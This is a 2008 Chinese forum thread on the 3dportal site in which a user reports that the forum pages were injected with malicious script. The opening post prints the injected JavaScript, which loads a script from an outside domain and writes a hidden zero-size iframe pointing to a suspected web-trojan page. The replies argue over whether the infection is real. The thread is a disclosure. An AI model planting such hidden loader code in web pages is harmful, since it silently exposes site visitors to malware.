QQ登录

只需一步,快速开始

登录 | 注册 | 找回密码

三维网

 找回密码
 注册

QQ登录

只需一步,快速开始

展开

通知     

查看: 2115|回复: 16
收起左侧

此网被挂马

[复制链接]
发表于 2008-11-26 14:38:57 | 显示全部楼层 |阅读模式 来自: 中国浙江金华

马上注册,结识高手,享用更多资源,轻松玩转三维网社区。

您需要 登录 才可以下载或查看,没有帐号?注册

x
马:Hack.Exploit.Script.JS.Mixed.c
  1. <script language="javascript" SRC="  ' target=_blank>http://u.cruze3.cn/u.js"></script> 2 W2 Q( ]1 [7 l0 J% O0 ?7 ]

  2. % x+ {6 f- A+ x: T
  3. document.writeln("<script>";
    ! F3 M4 z, m! S8 n; Z$ v
  4. document.writeln("function oK_Begin(){";
    % m  s: i8 q7 M8 o6 C
  5. document.writeln("var Then = new Date() ";8 s& \. s9 W1 x  {* W
  6. document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)";
    4 w9 M  z3 C2 Q' F: F
  7. document.writeln("var cookieString = new String(document.cookie)";2 \. [# h9 s9 j  t
  8. document.writeln("var cookieHeader = "Cookie1=" ";/ O) p4 E! T7 E# G6 G3 U8 A
  9. document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)";  P+ [" C* N& _# [
  10. document.writeln("if (beginPosition != -1){ ";
    6 K* B' W" H5 o0 B4 v8 G% ]7 }0 m
  11. document.writeln("} else ";
    # H6 {3 w7 v) O9 c. C
  12. document.writeln("{ document.cookie = "Cookie1=POPWINDOS;expires="+ Then.toGMTString() ";# r* @; x' @2 I, _- s& ^
  13. document.writeln("document.write(\'<iframe width=0 height=0 src="\'">http://u.cruze3.cn/u.htm"><\/iframe>\');";5 A( m- ], l. j: ?( `5 I3 |, s- H
  14. document.writeln("}";  W" q* U6 z7 }/ z
  15. document.writeln("}";
    ) ^! `8 a: ~8 }1 B) I
  16. document.writeln("oK_Begin();";- y9 Y. F- y  n: Y
  17. document.writeln("<\/script>";
    8 Z( `  f2 h- |- G9 {
  18. document.writeln("<script>window.onerror=function(){return true;}<\/script>"
    * m; X5 |7 l2 ^" S) H6 ?$ _5 T

  19. 2 W. j% c' \( p, K" P& c
  20. " M4 F  E' x. P/ m* X0 l

  21.   J3 i( j9 Z0 s' q: s

  22. 5 e! C: x0 g  @( b7 g

  23. 7 g. c1 d$ C9 [4 O6 \: G/ @. _1 e
复制代码
虽然从表面上去看是个恶意代码,但里面可能包含马,试图打开此网页u.htm,而此网页可能是网页木马
发表于 2008-11-26 14:44:03 | 显示全部楼层 来自: 中国浙江宁波
请管理员确认是否网页挂马?
发表于 2008-11-26 14:47:52 | 显示全部楼层 来自: 中国江苏南京
我的麦咖啡都没检测出来 你什么杀毒软件?
 楼主| 发表于 2008-11-26 16:16:23 | 显示全部楼层 来自: 中国浙江金华

回复 3# cayuer 的帖子

不是杀软件查的.
# H# a1 Y4 w5 ]7 Z只是无意中去看了源文件,感觉网头中的u.js很是反常(按常理说,很少在HEAD前,且根目录并是是此网站,于是,下载了u.js,发现不对头.它试图以最小化打开U.HTM网页,按平时的经验,它不是毒就是马,很少有人会在论坛上放毒,一般多是放马.) \: S9 j2 F0 \, ?/ t
不过,已经被清理了.
' R+ b9 @' K% _& j
) s% h/ t, ?7 A; v1 Q  W* V: y/ YHEHE5 o0 C+ j! h5 h

. U6 ~6 Q0 M6 Q5 P( B[ 本帖最后由 czy12 于 2008-11-26 16:25 编辑 ]
发表于 2008-11-26 18:27:17 | 显示全部楼层 来自: 中国浙江温州
你这个什么网站,哪里出来的?
" B  y, y1 v1 P
) L5 F& g. P. |7 w% Kht tp://u.cruze3.cn/u.js
 楼主| 发表于 2008-11-27 09:15:28 | 显示全部楼层 来自: 中国浙江金华

回复 5# 江南有雪 的帖子

http://u.cruze3.cn/u.js
+ v2 n  }% a/ g* l% A" n此网是个挂马网,是不可能看到的(他才不会那么笨,HEHE),一般都通过本地IIS进行域名转向.5 W! }! D: ^1 r" j- u# B8 I
这是昨天我想看别的网页的源文件时,无意中点了此网页的源文件,才发现不对头.' N7 @. t0 f9 s8 F% U- o4 [- K
HEHE
发表于 2008-11-27 10:26:38 | 显示全部楼层 来自: LAN

回复 6# czy12 的帖子

这跟三维有什么关系?
 楼主| 发表于 2008-11-27 11:01:02 | 显示全部楼层 来自: 中国浙江金华
这是挂在三维网论坛里的., K0 Q; {( D* o) y
红线所指
moma.jpg
发表于 2008-11-27 11:21:19 | 显示全部楼层 来自: 中国上海
奇怪,为什么我的里面没有?是不是楼主的机器自己带病毒了?
发表于 2008-11-27 11:26:10 | 显示全部楼层 来自: 中国甘肃兰州
自己的机子中毒了,就不要满天喊叫了,没人会认为你是一个杀毒的行家
 楼主| 发表于 2008-11-27 11:34:27 | 显示全部楼层 来自: 中国浙江金华
不学无术.: k! W4 b& Y' Z& n
HEHE
mlm.jpg
发表于 2008-11-27 14:30:45 | 显示全部楼层 来自: 中国香港
但在:
! z7 e6 F- b; Y5 _# qhttp://www.3dportal.cn/discuz/ 之原3 w8 L3 `+ n! Y  `! f
似乎看不见楼主所说的 http://u.cruze3.cn/u.js- N5 ~6 Q* P/ X& I& d

" Z; [3 u* B! g$ `8 L# o; J7 r[ 本帖最后由 yyywwwhk 于 2008-11-27 16:23 编辑 ]
发表于 2008-11-27 15:30:58 | 显示全部楼层 来自: 中国山东泰安
经过自编扫描代码处理结果,未发现楼主说的挂马代码!
* e% c, H1 R" o" E0 W
% e0 l' K- v; V% S& p- e1 a2 @9 r请清理自己计算机的缓冲区!
1.JPG
头像被屏蔽
发表于 2008-11-27 15:43:48 | 显示全部楼层 来自: 中国河北衡水
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2008-11-27 15:47:42 | 显示全部楼层 来自: 新加坡

回复 8# czy12 的帖子

看您的尾符/script,很像是U盘病毒。
 楼主| 发表于 2008-11-27 15:50:50 | 显示全部楼层 来自: 中国浙江金华
DZ6.1有代码自我修复功能。甚至可以在服务程序中设置定时还原数据库。- e$ `0 q6 W9 \. Q" A
我也说了:已修复。% r; x8 W$ s* c- f; H. t

# i  r# S) e  e/ Wps:这与缓存毫无关系。虽然缓存中有U.JS.3 g, }* P) L8 f5 T3 \2 w
但本机上的毒是不会去改动你的网页内容的.我的机子中毒,和你的网页源代码有何相关?6 ]5 n  f" \6 M( U5 L

2 C# f( D$ ^2 s8 u* ]) N2 g: fscript是个JAVA代码,与U盘何关?) x0 |. q$ G1 G) ?
9 x6 K  O" ?0 U5 ], }
HEHE! B: z6 U' _* P0 m3 F; f2 u9 Q
. b0 z3 s+ W# I5 c
[ 本帖最后由 czy12 于 2008-11-27 16:03 编辑 ]
发表于 2008-11-27 16:11:40 | 显示全部楼层 来自: 中国山东泰安
非也,代码是程序直接采样的当时的网页代码,是自编的,算不上权威,但是可以直接进入部分加密网站!  D3 `" e1 O$ P5 v2 @$ g
) e$ A* s* [* b  z. r4 b
如果却如你说的修改了,我想,这只有论坛管理员有这个权限,即便是后台也是有记录的。假如确实是论坛后台修改了,一定会给大伙一个说法的。: @; X& k  w/ m" p9 t2 }* _+ E. `

$ d# W/ F) M7 t# ]! i* W8 o& g相反,目前从各方面提供的代码显示,确实“此时此刻”是正常的!至于继续讨论已经无大的价值!
发表回复
您需要登录后才可以回帖 登录 | 注册

本版积分规则


Licensed Copyright © 2016-2020 http://www.3dportal.cn/ All Rights Reserved 京 ICP备13008828号

小黑屋|手机版|Archiver|三维网 ( 京ICP备2023026364号-1 )

快速回复 返回顶部 返回列表